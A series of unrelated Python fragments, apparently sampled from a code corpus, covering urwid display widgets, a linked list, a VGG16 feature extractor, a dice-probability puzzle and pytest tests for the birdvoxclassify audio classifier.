target_dir (str): The path of the directory to place all the files in.
base_name (str): The base name to use, i.e., the prefix, included in all files' names.
Raises:
ValueError: If ``target_dir`` does not refer to an existing directory.
"""
# sanitize args
insanity.sanitize_type("seq", seq, abc.Sequence)
insanity.sanitize_iterable("seq", seq, elements_type=knowledge_graph.KnowledgeGraph, min_length=1)
target_dir = str(target_dir)
if not os.path.isdir(target_dir):
raise ValueError("The provided <target_dir> does not exist: '{}'!".format(target_dir))
base_name = str(base_name)
# write the sequence to disk
for idx, kg in enumerate(seq):
cls.write(kg, target_dir, base_name, index=idx)
|
"""This problem was asked by Two Sigma.
Alice wants to join her school's Probability Student Club.
Membership dues are computed via one of two simple probabilistic games.
The first game: roll a die repeatedly. Stop rolling once you get a five
followed by a six. Your number of rolls is the amount you pay, in dollars.
The second game: same, except that the stopping condition
is a five followed by a five.
Which of the two games should Alice elect to play? Does it even matter?
Write a program to simulate the two games and calculate their expected value.
"""
|
"""
Widgets (purdy.widgets.py)
==========================
Widgets for displaying. These are called and managed through the Screen
classes in :mod:`purdy.ui`.
"""
import urwid
# =============================================================================
# Widgets
# =============================================================================
class DividingLine(urwid.Filler):
tab_focusable = False
def __init__(self):
divider = urwid.Divider('-')
super(DividingLine, self).__init__(divider)
# -----------------------------------------------------------------------------
# CodeWidget -- box that displays code
class ScrollingIndicator(urwid.Frame):
def __init__(self):
self.up = urwid.Text(' ')
self.down = urwid.Text(' ')
# create this Frame with a solid fill in the middle and the up and
# down Text widgets as the header and footer
super(ScrollingIndicator, self).__init__(urwid.SolidFill(' '),
header=self.up, footer=self.down)
def set_up(self, is_up, focus):
if is_up and focus:
self.up.set_text('▲')
elif is_up and not focus:
self.up.set_text('△')
else:
self.down.set_text(' ')
def set_down(self, is_down, focus):
if is_down and focus:
self.down.set_text('▼')
elif is_down and not focus:
self.down.set_text('▽')
else:
self.down.set_text(' ')
def set_focus_only(self, focus):
if focus:
self.up.set_text('▮')
else:
self.up.set_text('▯')
class ScrollingListBox(urwid.ListBox):
def __init__(self, scroll_indicator, *args, **kwargs):
self.scroll_indicator = scroll_indicator
super(ScrollingListBox, self).__init__(*args, **kwargs)
def render(self, size, focus):
result = super(ScrollingListBox, self).render(size, focus)
# ends_visible() returns a list with the words "top" and/or "bottom"
# in it if the top and/or bottom of the list box is visible
#
# set our scrolling indicators based on what is visible
visible = self.ends_visible(size)
if 'top' in visible and 'bottom' in visible:
self.scroll_indicator.set_focus_only(focus)
else:
self.scroll_indicator.set_up('top' not in visible, focus)
self.scroll_indicator.set_down('bottom' not in visible, focus)
return result
def keypress(self, size, key):
if key == 'up' and self.focus_position == 0:
# don't want arrow up to change parent's focus, eat this key
return None
if key == 'down' and self.focus_position + 1 >= len(self.body):
# don't want arrow down to change parent's focus, eat this key
return None
return super().keypress(size, key)
class CodeWidget(urwid.Columns):
"""Urwid widget that displays the code. This implements the methods of
:class:`purdy.content.RenderHook` and is registered against a
:class:`purdy.ui.CodeBox` and :class:`purdy.content.Listing`. As changes
    are made to the listing they will be rendered in this widget.
The widget wraps an urwid ListBox, with each line in the box being a line
    of code. It also provides indicators on the right side of the screen as
to whether there is content above or below the current screen. If the
parent :class:`Screen` implementation has multiple instances of this class
active, the scroll area will also indicate which code box is focused.
The up and down arrows as well as the page-up and page-down buttons are
    supported. If there are multiple code widgets, the tab key will change the
focus.
"""
tab_focusable = True
# CodeWidget is a Column collection containing a ListBox of Text for the
# code and a side bar with indicators about focus and scroll position
def __init__(self, screen, auto_scroll):
"""Constructor. These objects should only be constructed by a parent
:class:`Screen` object.
:param screen: the :class:`Screen` building this code box
"""
self.screen = screen
self.auto_scroll = auto_scroll
# urwid does weird things when trying to focus an empty listing, never
# allow it to be empty
self.is_empty = True
self.walker = urwid.SimpleListWalker([urwid.Text(''), ])
scroller = ScrollingIndicator()
self.listbox = ScrollingListBox(scroller, self.walker)
layout = [self.listbox, (1, scroller)]
super(CodeWidget, self).__init__(layout)
#--- RenderHook methods
def line_inserted(self, listing, position, line):
markup = listing.render_line(line)
index = position - 1
if self.is_empty:
self.walker.contents[0] = urwid.Text(markup)
self.is_empty = False
else:
self.walker.contents.insert(index, urwid.Text(markup))
if self.auto_scroll:
# if auto scrolling, change focus to last inserted item
self.listbox.set_focus(index)
def line_removed(self, listing, position):
if len(self.walker.contents) == 1:
self.is_empty = True
self.walker.contents[0] = urwid.Text('')
else:
del self.walker.contents[position - 1]
# urwid crashes if the focus is set outside of the range and you
# try to do other operations to the box before returning to the
# event loop, fix this by setting the focus to the last item
size = len(self.walker.contents)
if size > 0:
self.listbox.set_focus(size - 1)
def line_changed(self, listing, position, line):
markup = listing.render_line(line)
index = position - 1
self.walker.contents[index].set_text(markup)
def clear(self):
self.is_empty = True
self.walker.contents.clear()
self.walker.contents.insert(0, urwid.Text(''))
class TwinContainer(urwid.Columns):
### A column with the tab_focusable attribute so the BaseWindow class
# knows to do tab focus changes on it
tab_focusable = True
|
__author__ = 'jaap'
|
#%%
# Prepare the image, bounding boxes and labels
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# Use VGG16 as the backbone
# Truncate VGG16 so that its output feature map size becomes 800//16 = 50
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# The feature extractor is complete
faster_rcnn_fe_extractor = nn.Sequential(*req_features)
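#%%
# Sanity check (a sketch, not in the original script): the truncated VGG16
# should map the 800x800 dummy image to a 50x50 feature map with
# `out_channels` channels.
out_map = faster_rcnn_fe_extractor(dummy_img)
print(out_map.shape)  # expected: torch.Size([1, out_channels, 50, 50])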
|
#!python
class Node(object):
def __init__(self, data):
"""Initialize this node with the given data."""
self.data = data
self.next = None
def __repr__(self):
"""Return a string representation of this node."""
return 'Node({!r})'.format(self.data)
class LinkedList(object):
def __init__(self, items=None):
"""Initialize this linked list and append the given items, if any."""
self.head = None # First node
self.tail = None # Last node
self.list_length = 0
# Append given items
if items is not None:
for item in items:
self.append(item)
self.temp = self.head
def __str__(self):
"""Return a formatted string representation of this linked list."""
items = ['({!r})'.format(item) for item in self.items()]
return '[{}]'.format(' -> '.join(items))
def __repr__(self):
"""Return a string representation of this linked list."""
return 'LinkedList({!r})'.format(self.items())
def __contains__(self, item):
        return self.find(lambda entry: entry == item) is not None
def __len__(self):
return self.list_length
def __iter__(self):
return self.generator()
def generator(self):
node = self.head
while node is not None:
yield node.data
node = node.next
def items(self):
"""Return a list (dynamic array) of all items in this linked list.
Best and worst case running time: O(n) for n items in the list (length)
because we always need to loop through all n nodes to get each item."""
items = [] # O(1) time to create empty list
# Start at head node
node = self.head # O(1) time to assign new variable
# Loop until node is None, which is one node too far past tail
while node is not None: # Always n iterations because no early return
items.append(node.data) # O(1) time (on average) to append to list
# Skip to next node to advance forward in linked list
node = node.next # O(1) time to reassign variable
# Now list contains items from all nodes
return items # O(1) time to return list
def is_empty(self):
"""Return a boolean indicating whether this linked list is empty."""
return self.head is None
def length(self):
"""Return the length of this linked list by traversing its nodes.
Running time: O(1) - length is stored as a variable that can be accessed in constant time"""
return self.list_length
def append(self, item):
"""Insert the given item at the tail of this linked list.
Running time: O(1) no matter how long the list, takes constant time"""
# Create new node to hold given item
node = Node(item)
# Append node after tail, if it exists
if self.tail is not None:
self.tail.next = node
self.tail = node
else:
self.head = node
self.tail = node
self.list_length += 1
def prepend(self, item):
"""Insert the given item at the head of this linked list.
Running time: O(1) Thanks to the head 'pointer' this is constant time"""
# Create new node to hold given item
node = Node(item)
# Prepend node before head, if it exists
if self.head is not None:
node.next = self.head
self.head = node
else:
self.head = node
self.tail = node
self.list_length += 1
def find(self, quality):
"""Return an item from this linked list satisfying the given quality.
        Best case running time: O(1) if the node is at the beginning of the list
        Worst case running time: O(n) if the node is at the end of the list"""
# Loop through all nodes to find item where quality(item) is True
# Check if node's data satisfies given quality function
match = None
node = self.head
while node is not None:
if quality(node.data) is True:
match = node.data
node = None
else:
node = node.next
return match
def delete(self, item):
"""Delete the given item from this linked list, or raise ValueError.
Best case running time: O(1) if node is at the beginning of the list
Worst case running time: O(n) if node is at the end of the list or doesn't exist"""
# Loop through all nodes to find one whose data matches given item
# Update previous node to skip around node with matching data
# Otherwise raise error to tell user that delete has failed
# raise ValueError('Item not found: {}'.format(item))
previous = None
found = False
node = self.head
while not found and node is not None:
if node.data == item:
# if we're not at the head, connect the previous node with the next one
if previous is not None:
previous.next = node.next
# if we ARE at the head, make the next node the head
else:
self.head = node.next
# if we're at the tail, point the tail to the previous node
if node.next is None:
self.tail = previous
self.list_length -= 1
found = True
previous = node
node = node.next
if not found:
raise ValueError('Item not found: {}'.format(item))
def replace(self, comparator, replacement):
# O(n) time complexity
# Walk through list until we find the target, then replace the data
found = False
node = self.head
while not found and node is not None:
if comparator(node.data) is True:
node.data = replacement
found = True
node = node.next
if not found:
raise ValueError('Replacement target not found.')
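# A small usage sketch (not part of the original module): find() takes a
# predicate over item data, and replace() swaps the data of the first match.
def example_find_and_replace():
    ll = LinkedList(['apple', 'banana', 'cherry'])
    assert ll.find(lambda item: item.startswith('b')) == 'banana'
    ll.replace(lambda item: item == 'cherry', 'date')
    assert 'date' in ll and 'cherry' not in ll
    return ll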
def test_linked_list():
ll = LinkedList()
print('list: {}'.format(ll))
print('\nTesting append:')
for item in ['A', 'B', 'C']:
print('append({!r})'.format(item))
ll.append(item)
print('list: {}'.format(ll))
print('head: {}'.format(ll.head))
print('tail: {}'.format(ll.tail))
print('length: {}'.format(ll.length()))
# Enable this after implementing delete method
delete_implemented = True
if delete_implemented:
print('\nTesting delete:')
for item in ['B', 'C', 'A']:
print('delete({!r})'.format(item))
ll.delete(item)
print('list: {}'.format(ll))
print('head: {}'.format(ll.head))
print('tail: {}'.format(ll.tail))
print('length: {}'.format(ll.length()))
if __name__ == '__main__':
test_linked_list()
|
import hashlib
import json
import logging
import os
import pathlib
import shutil
import sys
import tempfile
import pytest
import numpy as np
import soundfile as sf
from scipy.signal.windows import get_window
from numbers import Real
from birdvoxclassify import *
from birdvoxclassify.core import apply_hierarchical_consistency, \
_validate_prediction, _validate_batch_pred_list, _validate_taxonomy
from birdvoxclassify.birdvoxclassify_exceptions import BirdVoxClassifyError
PROJECT_DIR = os.path.join(os.path.dirname(__file__), "..")
MODULE_DIR = os.path.join(PROJECT_DIR, "birdvoxclassify")
TEST_AUDIO_DIR = os.path.join(os.path.dirname(__file__), 'data/audio')
CHIRP_PATH = os.path.join(TEST_AUDIO_DIR, 'synth_chirp.wav')
RES_DIR = os.path.join(MODULE_DIR, "resources")
TAX_DIR = os.path.join(RES_DIR, "taxonomy")
MODELS_DIR = os.path.join(RES_DIR, "models")
TAXV1_HIERARCHICAL_PATH = os.path.join(TAX_DIR, "tv1hierarchical.json")
TAXV1_FINE_PATH = os.path.join(TAX_DIR, "tv1fine.json")
MODEL_SUFFIX = "flat-multitask-convnet-v2_" \
"tv1hierarchical-3c6d869456b2705ea5805b6b7d08f870"
MODEL_NAME = "birdvoxclassify-{}".format(MODEL_SUFFIX)
def test_process_file():
test_output_dir = tempfile.mkdtemp()
test_audio_dir = tempfile.mkdtemp()
classifier = load_classifier(MODEL_NAME)
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
test_output_summary_path = os.path.join(test_output_dir, "summary.json")
test_output_path = get_output_path(CHIRP_PATH, '.json',
test_output_dir)
suffix_test_output_path = get_output_path(CHIRP_PATH,
'suffix.json',
test_output_dir)
try:
# Test with defaults
output = process_file(CHIRP_PATH, model_name=MODEL_NAME)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test with selecting best candidates
output = process_file(CHIRP_PATH, model_name=MODEL_NAME,
select_best_candidates=True)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# There should only be one candidate per level
for level, cand_dict in v.items():
assert isinstance(level, str)
assert isinstance(cand_dict, dict)
# Test with list
output = process_file([CHIRP_PATH], model_name=MODEL_NAME)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test with given classifier and taxonomy
output = process_file([CHIRP_PATH], classifier=classifier,
taxonomy=taxonomy)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test output_dir
output = process_file([CHIRP_PATH], output_dir=test_output_dir,
classifier=classifier)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(test_output_path, 'r') as f:
f_output = json.load(f)
assert next(iter(output.values())) == f_output
# Test output dir with suffix
output = process_file([CHIRP_PATH], output_dir=test_output_dir,
classifier=classifier, suffix='suffix')
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(suffix_test_output_path, 'r') as f:
f_output = json.load(f)
assert next(iter(output.values())) == f_output
# Test output summary file
output = process_file([CHIRP_PATH],
output_summary_path=test_output_summary_path,
classifier=classifier)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(test_output_summary_path, 'r') as f:
f_output = json.load(f)
assert output == f_output
test_a_path = os.path.join(test_audio_dir, "a.wav")
test_b_path = os.path.join(test_audio_dir, "b.wav")
test_c_path = os.path.join(test_audio_dir, "c.wav")
test_d_path = os.path.join(test_audio_dir, "d.wav")
shutil.copy(CHIRP_PATH, test_a_path)
shutil.copy(CHIRP_PATH, test_b_path)
shutil.copy(CHIRP_PATH, test_c_path)
shutil.copy(CHIRP_PATH, test_d_path)
test_audio_list = [test_a_path, test_b_path, test_c_path, test_d_path]
# Test multiple files
output = process_file(test_audio_list, classifier=classifier)
assert type(output) == dict
assert len(output) == len(test_audio_list)
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Test with different batch_sizes
output = process_file(test_audio_list, classifier=classifier, batch_size=2)
assert type(output) == dict
assert len(output) == len(test_audio_list)
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
# Make sure we create the output dir if it doesn't exist
shutil.rmtree(test_output_dir)
output = process_file([CHIRP_PATH], output_dir=test_output_dir,
classifier=classifier)
assert type(output) == dict
assert len(output) == 1
for k, v in output.items():
assert isinstance(k, str)
assert type(v) == dict
with open(test_output_path, 'r') as f:
f_output = json.load(f)
assert next(iter(output.values())) == f_output
finally:
shutil.rmtree(test_output_dir)
shutil.rmtree(test_audio_dir)
def test_format_pred():
taxonomy = load_taxonomy(TAXV1_FINE_PATH)
pred = np.random.random((15,))
pred /= pred.sum()
pred_list = [pred]
output_ids = [
"1.1.1",
"1.1.2",
"1.1.3",
"1.1.4",
"1.2.1",
"1.3.1",
"1.3.2",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.4.5",
"1.4.6",
"1.4.7",
"other"
]
exp_output = {'fine': {}}
for idx, ref_id in enumerate(output_ids):
if ref_id == "other":
node = {
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][idx]["ids"]
}
else:
node = get_taxonomy_node(ref_id, taxonomy)
exp_output['fine'][ref_id] = {'probability': pred[idx]}
exp_output['fine'][ref_id].update(node)
output = format_pred(pred_list, taxonomy)
for ref_id in output_ids:
assert output['fine'][ref_id]["common_name"] \
== exp_output['fine'][ref_id]["common_name"]
assert output['fine'][ref_id]["scientific_name"] \
== exp_output['fine'][ref_id]["scientific_name"]
assert output['fine'][ref_id]["taxonomy_level_names"] \
== exp_output['fine'][ref_id]["taxonomy_level_names"]
assert output['fine'][ref_id]["taxonomy_level_aliases"] \
== exp_output['fine'][ref_id]["taxonomy_level_aliases"]
assert output['fine'][ref_id]["child_ids"] \
== exp_output['fine'][ref_id]["child_ids"]
assert np.isclose(output['fine'][ref_id]["probability"],
exp_output['fine'][ref_id]["probability"])
if ref_id != "other":
assert output['fine'][ref_id]["id"] \
== exp_output['fine'][ref_id]["id"] \
== ref_id
# Test when we have a batch dimension of 1
pred_list = [pred[np.newaxis, :]]
output = format_pred(pred_list, taxonomy)
for ref_id in output_ids:
assert output['fine'][ref_id]["common_name"] \
== exp_output['fine'][ref_id]["common_name"]
assert output['fine'][ref_id]["scientific_name"] \
== exp_output['fine'][ref_id]["scientific_name"]
assert output['fine'][ref_id]["taxonomy_level_names"] \
== exp_output['fine'][ref_id]["taxonomy_level_names"]
assert output['fine'][ref_id]["taxonomy_level_aliases"] \
== exp_output['fine'][ref_id]["taxonomy_level_aliases"]
assert output['fine'][ref_id]["child_ids"] \
== exp_output['fine'][ref_id]["child_ids"]
assert np.isclose(output['fine'][ref_id]["probability"],
exp_output['fine'][ref_id]["probability"])
if ref_id != "other":
assert output['fine'][ref_id]["id"] \
== exp_output['fine'][ref_id]["id"] \
== ref_id
# Make sure we fail when batch dimension is greater than 1
pred_list = [np.tile(pred, (2, 1))]
pytest.raises(BirdVoxClassifyError, format_pred, pred_list, taxonomy)
# Make sure we fail with wrong taxonomy
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
pred_list = [pred]
pytest.raises(BirdVoxClassifyError, format_pred, pred_list, taxonomy)
# Test the hierarchical case
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
fine_pred = np.random.random((15,))
medium_pred = np.random.random((5,))
coarse_pred = np.random.random((1,))
pred_list = [coarse_pred, medium_pred, fine_pred]
output = format_pred(pred_list, taxonomy)
exp_output = {}
for level_idx, (level, encoding_list) \
in enumerate(taxonomy['output_encoding'].items()):
exp_output[level] = {}
for idx, encoding_item in enumerate(encoding_list):
if len(encoding_item["ids"]) > 1:
ref_id = "other"
node = {
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": level,
"taxonomy_level_aliases": {},
'child_ids': encoding_item["ids"]
}
else:
ref_id = encoding_item["ids"][0]
node = get_taxonomy_node(ref_id, taxonomy)
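            # The coarse level has a single model output, so the probability of its
            # "other" entry (idx == 1) is the complement of that single prediction.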
if level == 'coarse' and idx == 1:
exp_output[level][ref_id] = {
'probability': 1 - pred_list[level_idx][0]}
else:
exp_output[level][ref_id] = {'probability': pred_list[level_idx][idx]}
exp_output[level][ref_id].update(node)
for level, encoding_list in taxonomy["output_encoding"].items():
for encoding_item in encoding_list:
if len(encoding_item["ids"]) > 1:
ref_id = "other"
else:
ref_id = encoding_item["ids"][0]
assert output[level][ref_id]["common_name"] \
== exp_output[level][ref_id]["common_name"]
assert output[level][ref_id]["scientific_name"] \
== exp_output[level][ref_id]["scientific_name"]
assert output[level][ref_id]["taxonomy_level_names"] \
== exp_output[level][ref_id]["taxonomy_level_names"]
assert output[level][ref_id]["taxonomy_level_aliases"] \
== exp_output[level][ref_id]["taxonomy_level_aliases"]
assert output[level][ref_id]["child_ids"] \
== exp_output[level][ref_id]["child_ids"]
assert np.isclose(output[level][ref_id]["probability"],
exp_output[level][ref_id]["probability"])
if ref_id != "other":
assert output[level][ref_id]["id"] \
== exp_output[level][ref_id]["id"] \
== ref_id
# Make sure real prediction makes it through the pipeline
audio, sr = sf.read(CHIRP_PATH, dtype='float64')
classifier = load_classifier(MODEL_NAME)
pcen = compute_pcen(audio, sr)
pred = predict(pcen, classifier, logging.INFO)
output = format_pred(pred, taxonomy)
def test_format_pred_batch():
taxonomy = load_taxonomy(TAXV1_FINE_PATH)
pred = np.random.random((15,))
pred /= pred.sum()
output_ids = [
"1.1.1",
"1.1.2",
"1.1.3",
"1.1.4",
"1.2.1",
"1.3.1",
"1.3.2",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.4.5",
"1.4.6",
"1.4.7",
"other"
]
exp_output = {'fine': {}}
for idx, ref_id in enumerate(output_ids):
if ref_id == "other":
node = {
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][idx]["ids"]
}
else:
node = get_taxonomy_node(ref_id, taxonomy)
exp_output['fine'][ref_id] = {'probability': pred[idx]}
exp_output['fine'][ref_id].update(node)
batch_pred_list = [np.tile(pred, (10, 1))]
exp_output_batch = [exp_output] * 10
output_batch = format_pred_batch(batch_pred_list=batch_pred_list,
taxonomy=taxonomy)
for idx, output in enumerate(output_batch):
for ref_id in output_ids:
exp_output = exp_output_batch[idx]
assert output['fine'][ref_id]["common_name"] \
== exp_output['fine'][ref_id]["common_name"]
assert output['fine'][ref_id]["scientific_name"] \
== exp_output['fine'][ref_id]["scientific_name"]
assert output['fine'][ref_id]["taxonomy_level_names"] \
== exp_output['fine'][ref_id]["taxonomy_level_names"]
assert output['fine'][ref_id]["taxonomy_level_aliases"] \
== exp_output['fine'][ref_id]["taxonomy_level_aliases"]
assert output['fine'][ref_id]["child_ids"] \
== exp_output['fine'][ref_id]["child_ids"]
assert np.isclose(output['fine'][ref_id]["probability"],
exp_output['fine'][ref_id]["probability"])
if ref_id != "other":
assert output['fine'][ref_id]["id"] \
== exp_output['fine'][ref_id]["id"] \
== ref_id
pytest.raises(BirdVoxClassifyError, format_pred_batch,
[np.tile(pred, (10, 1)), np.tile(pred, (5, 1))], taxonomy)
def test_get_taxonomy_node():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
ref_id = "1"
node = get_taxonomy_node(ref_id, taxonomy)
assert "id" in node
assert "common_name" in node
assert "scientific_name" in node
assert "taxonomy_level_names" in node
assert "taxonomy_level_aliases" in node
assert "child_ids" in node
assert node["id"] == ref_id
assert isinstance(node["common_name"], str)
assert isinstance(node["scientific_name"], str)
assert node["taxonomy_level_names"] == "coarse"
assert isinstance(node["taxonomy_level_aliases"], dict)
assert type(node["child_ids"]) == list
assert len(node["child_ids"]) >= 1
ref_id = "1.1"
node = get_taxonomy_node(ref_id, taxonomy)
assert "id" in node
assert "common_name" in node
assert "scientific_name" in node
assert "taxonomy_level_names" in node
assert "taxonomy_level_aliases" in node
assert "child_ids" in node
assert node["id"] == ref_id
assert isinstance(node["common_name"], str)
assert isinstance(node["scientific_name"], str)
assert node["taxonomy_level_names"] == "medium"
assert isinstance(node["taxonomy_level_aliases"], dict)
assert type(node["child_ids"]) == list
assert len(node["child_ids"]) >= 1
ref_id = "1.1.1"
node = get_taxonomy_node(ref_id, taxonomy)
assert "id" in node
assert "common_name" in node
assert "scientific_name" in node
assert "taxonomy_level_names" in node
assert "taxonomy_level_aliases" in node
assert "child_ids" in node
assert node["id"] == ref_id
assert isinstance(node["common_name"], str)
assert isinstance(node["scientific_name"], str)
assert node["taxonomy_level_names"] == "fine"
assert isinstance(node["taxonomy_level_aliases"], dict)
assert type(node["child_ids"]) == list
assert len(node["child_ids"]) == 0
ref_id = "other"
node = get_taxonomy_node(ref_id, taxonomy)
assert node == {"id": "other"}
# Check for invalid inputs
pytest.raises(BirdVoxClassifyError, get_taxonomy_node, "0", taxonomy)
pytest.raises(TypeError, get_taxonomy_node, "1", [])
pytest.raises(BirdVoxClassifyError, get_taxonomy_node, "1",
{'taxonomy': []})
pytest.raises(BirdVoxClassifyError, get_taxonomy_node, "1",
{'taxonomy': [{}]})
def test_batch_generator():
pcen_settings = get_pcen_settings()
# Test invalid inputs
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator(['/invalid/path.wav'], batch_size=512)
next(gen)
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator(['/invalid/path.wav'], batch_size=-1)
next(gen)
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator(['/invalid/path.wav'], batch_size=512.0)
next(gen)
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator([], batch_size=512)
next(gen)
# Test empty file
empty_path = 'empty.wav'
pathlib.Path(empty_path).touch()
try:
with pytest.raises(BirdVoxClassifyError) as e:
gen = batch_generator([empty_path], batch_size=512)
next(gen)
finally:
os.remove(empty_path)
gen = batch_generator([CHIRP_PATH]*10, batch_size=10)
batch, batch_filepaths = next(gen)
assert type(batch) == np.ndarray
assert batch.shape == (10, pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
assert len(batch_filepaths) == 10
gen = batch_generator([CHIRP_PATH], batch_size=10)
batch, batch_filepaths = next(gen)
assert type(batch) == np.ndarray
assert batch.shape == (1, pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
assert len(batch_filepaths) == 1
def test_compute_pcen():
pcen_settings = get_pcen_settings()
audio, sr = sf.read(CHIRP_PATH, dtype='float64')
pcenf64 = compute_pcen(audio, sr)
assert pcenf64.dtype == np.float32
assert pcenf64.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pcenf64_r = compute_pcen(audio, sr, input_format=False)
assert pcenf64_r.dtype == np.float32
assert pcenf64_r.ndim == 2
assert pcenf64_r.shape[0] == pcen_settings['top_freq_id']
audio, sr = sf.read(CHIRP_PATH, dtype='float32')
pcenf32 = compute_pcen(audio, sr)
assert pcenf32.dtype == np.float32
assert pcenf32.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pcenf32_r = compute_pcen(audio, sr, input_format=False)
assert pcenf32_r.dtype == np.float32
assert pcenf32_r.ndim == 2
assert pcenf32_r.shape[0] == pcen_settings['top_freq_id']
audio, sr = sf.read(CHIRP_PATH, dtype='int16')
pceni16 = compute_pcen(audio, sr)
assert pceni16.dtype == np.float32
assert pceni16.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pceni16_r = compute_pcen(audio, sr, input_format=False)
assert pceni16_r.dtype == np.float32
assert pceni16_r.ndim == 2
assert pceni16_r.shape[0] == pcen_settings['top_freq_id']
audio, sr = sf.read(CHIRP_PATH, dtype='int32')
pceni32 = compute_pcen(audio, sr)
assert pceni32.dtype == np.float32
assert pceni32.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
pceni32_r = compute_pcen(audio, sr, input_format=False)
assert pceni32_r.dtype == np.float32
assert pceni32_r.ndim == 2
assert pceni32_r.shape[0] == pcen_settings['top_freq_id']
# Make sure PCEN values are similar for different input representations
assert np.allclose(pcenf64, pcenf32, rtol=1e-5, atol=1e-5)
assert np.allclose(pcenf64, pceni16, rtol=1e-5, atol=1e-5)
assert np.allclose(pcenf64, pceni32, rtol=1e-5, atol=1e-5)
# Make sure that padding is handled with short audio
short_audio = np.random.random((10,))
short_pcen = compute_pcen(short_audio, sr)
assert short_pcen.dtype == np.float32
assert short_pcen.shape == (pcen_settings['top_freq_id'],
pcen_settings['n_hops'], 1)
# Make sure unsigned ints raise an error
pytest.raises(BirdVoxClassifyError, compute_pcen,
audio.astype('uint32'), sr)
def test_predict():
classifier = load_classifier(MODEL_NAME)
audio, sr = sf.read(CHIRP_PATH, dtype='float64')
pcen = compute_pcen(audio, sr)
pred = predict(pcen, classifier, logging.INFO)
assert type(pred) == list
assert pred[0].shape == (1, 1)
assert pred[1].shape == (1, 5)
assert pred[2].shape == (1, 15)
gen = batch_generator([CHIRP_PATH]*10, batch_size=10)
batch, batch_filepaths = next(gen)
pred = predict(batch, classifier, logging.INFO)
assert type(pred) == list
assert pred[0].shape == (10, 1)
assert pred[1].shape == (10, 5)
assert pred[2].shape == (10, 15)
# Test invalid inputs
inv_pcen = compute_pcen(audio, sr, input_format=False)[..., np.newaxis]
pytest.raises(BirdVoxClassifyError, predict, inv_pcen, classifier, logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.array([1, 2, 3, 4]), classifier,
logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.zeros((1, 42, 104, 1)),
classifier, logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.zeros((1, 120, 42, 1)),
classifier, logging.INFO)
pytest.raises(BirdVoxClassifyError, predict, np.zeros((1, 120, 104, 42)),
classifier, logging.INFO)
def test_get_output_path():
filepath = '/path/to/file/test.wav'
output_dir = '/output/dir'
exp_output_path = '/path/to/file/test.npz'
output_path = get_output_path(filepath, ".npz", None)
assert output_path == exp_output_path
exp_output_path = '/path/to/file/test_suffix.npz'
output_path = get_output_path(filepath, "suffix.npz", None)
assert output_path == exp_output_path
exp_output_path = '/output/dir/test.npz'
output_path = get_output_path(filepath, ".npz", output_dir)
assert output_path == exp_output_path
exp_output_path = '/output/dir/test_suffix.npz'
output_path = get_output_path(filepath, "suffix.npz", output_dir)
assert output_path == exp_output_path
def test_get_pcen_settings():
settings = get_pcen_settings()
assert type(settings) == dict
assert 'sr' in settings
assert isinstance(settings['sr'], Real)
assert settings['sr'] > 0
assert 'fmin' in settings
assert isinstance(settings['fmin'], Real)
assert settings['fmin'] > 0
assert 'fmax' in settings
assert isinstance(settings['fmax'], Real)
assert settings['fmax'] > settings['fmin']
assert settings['sr'] / 2.0 >= settings['fmax']
assert 'hop_length' in settings
assert isinstance(settings['hop_length'], int)
assert settings['hop_length'] > 0
assert 'n_fft' in settings
assert isinstance(settings['n_fft'], int)
assert settings['n_fft'] > 0
assert 'n_mels' in settings
assert isinstance(settings['n_mels'], int)
assert settings['n_fft'] > settings['n_mels'] > 0
assert 'pcen_delta' in settings
assert isinstance(settings['pcen_delta'], float)
assert settings['pcen_delta'] > 0
assert 'pcen_time_constant' in settings
assert isinstance(settings['pcen_time_constant'], float)
assert settings['pcen_time_constant'] > 0
assert 'pcen_norm_exponent' in settings
assert isinstance(settings['pcen_norm_exponent'], float)
